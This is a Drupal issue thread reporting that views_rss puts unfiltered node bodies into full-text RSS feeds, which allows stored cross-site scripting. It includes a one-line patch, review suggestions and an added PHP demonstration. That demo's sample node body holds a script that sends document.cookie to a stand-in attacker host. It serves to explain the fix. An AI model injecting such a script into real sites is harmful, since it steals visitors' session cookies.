If you have your RSS feeds configured to output the full text of nodes, and you use views_rss to generate an RSS feed, the feed will have the raw body content of the nodes in the feed. However, the body content ought to have input filters applied.
To reproduce, set the RSS settings to include full-text (rather than just the teaser). Then look at the default frontpage view's feed, which is at frontpage/feed. The feed's items will have been output without input filtering.
This is a security bug, because it enables stored cross-site scripting attacks. Consider, if you have a site in which users may register and submit content all without prior approval. A malicious user could submit content with malicious JavaScript (or some other malicious code), which would then be transmitted, unfiltered, via any views RSS feeds. Any user who happens to look at the feed would have the malicious code run in his browser.
The fix is trivial. The return value of node_invoke() needs to be assigned to the output object, thusly:
142c142
< node_invoke($item, 'view', $teaser, FALSE);
---
> $item = node_invoke($item, 'view', $teaser, FALSE);
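Review bot: the assignment on line 142 overwrites $item with whatever node_invoke() returns and the hunk adds no check that a node actually came back; if the type's view hook returns nothing, $item becomes NULL and the feed item is lost rather than filtered. Suggest guarding it, e.g. `$viewed = node_invoke($item, 'view', $teaser, FALSE); if ($viewed) { $item = $viewed; }`, and, since nothing in this hunk filters at the output point itself, also passing the body through check_markup($item->body, $item->format, FALSE) where it is written into the feed so the fix does not depend on every node type's view hook applying the input format.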
-TimK
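To make the by-value point in the report concrete, here is an added stand-alone PHP script; it is not views_rss or Drupal code. The node contents, filtered_markup() and fake_node_invoke_view() are constructed stand-ins, and the assumption (taken from the report) is that the node type's view hook hands back a node whose body has had the input format applied while the object the caller still holds is left as stored.

```php
<?php
// Added illustration, not code from views_rss or Drupal. It models the
// buggy and fixed shapes of the feed loop with stand-ins so the effect
// of discarding node_invoke()'s return value can be seen offline.

// Constructed node, stored exactly as a self-registered user submitted it.
function make_node() {
  $node = new stdClass();
  $node->nid = 1;
  $node->title = 'Hello';
  $node->body = '<p>Hi</p><script>location="http://attacker.example/?c=" + document.cookie</script>';
  $node->teaser = '<p>Hi</p>';
  $node->format = 1; // assumed: a whitelist-based "Filtered HTML" format
  return $node;
}

// Stand-in for the input filter chain. Assumption: it behaves like a tag
// whitelist, which is what the default filtered format does; the real
// filters also neutralise attributes and other vectors that this does not.
function filtered_markup($text) {
  return strip_tags($text, '<a><em><strong><p><ul><ol><li>');
}

// Stand-in for node_invoke($node, 'view', $teaser, $page). Assumption from
// the report: the view hook returns a node whose body has been run through
// the input format, while the object the caller holds stays raw.
function fake_node_invoke_view($node, $teaser) {
  $viewed = clone $node;
  $viewed->body = filtered_markup($teaser ? $node->teaser : $node->body);
  return $viewed;
}

// Buggy shape: the filtered node is thrown away, $item->body is still raw.
function feed_body_before($item, $teaser) {
  fake_node_invoke_view($item, $teaser);
  return $item->body;
}

// Fixed shape from the report: keep the node the hook returned.
function feed_body_after($item, $teaser) {
  $item = fake_node_invoke_view($item, $teaser);
  return $item->body;
}

// Wrap a body into an RSS item. The escaping is for XML well-formedness;
// readers that render <description> as HTML decode it again, so escaping
// is not a substitute for the input filters.
function rss_item($title, $body) {
  return '<item><title>' . htmlspecialchars($title) . '</title>'
       . '<description>' . htmlspecialchars($body) . '</description></item>';
}

$node = make_node();
foreach (array('before' => feed_body_before($node, FALSE),
               'after'  => feed_body_after($node, FALSE)) as $label => $body) {
  $has_script = strpos($body, '<script') !== FALSE;
  printf("%-6s fix: script tag in feed body: %s\n", $label, $has_script ? 'yes' : 'no');
  echo rss_item($node->title, $body), "\n";
}
```

Run it with the PHP CLI. The "before" path carries the script element into the feed body because the caller's object was never updated; the "after" path does not, because the filtered node returned by the hook is the one that gets serialised. A real check of a site should look at the actual frontpage/feed output, as the report describes, rather than at this model.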
Comment | File | Size | Author
---|---|---|---
#1 | views_rss.module.HEAD_.patch | 570 bytes | gnassar
Comments
Comment #1
gnassar: Had the same problem. TimK's patch seems to have fixed it. Nice catch!
Went ahead and made up a patch for it.
Comment #2
gnassar: As a security bug, it'd be nice to get this into HEAD before the 6 freeze, I imagine, for any future branching.
Comment #3
merlinofchaos: Committed to -dev! Thanks!
Comment #4
(not verified)
Comment #5
rfay: Although the CHANGELOG.txt for views 5.x-1.6 says that this patch was applied, it was not, and this bug still exists in 5.x-1.6.
Comment #6
merlinofchaos
Comment #7
esmerel: At this time, only security fixes will be made to the 5.x version of Views.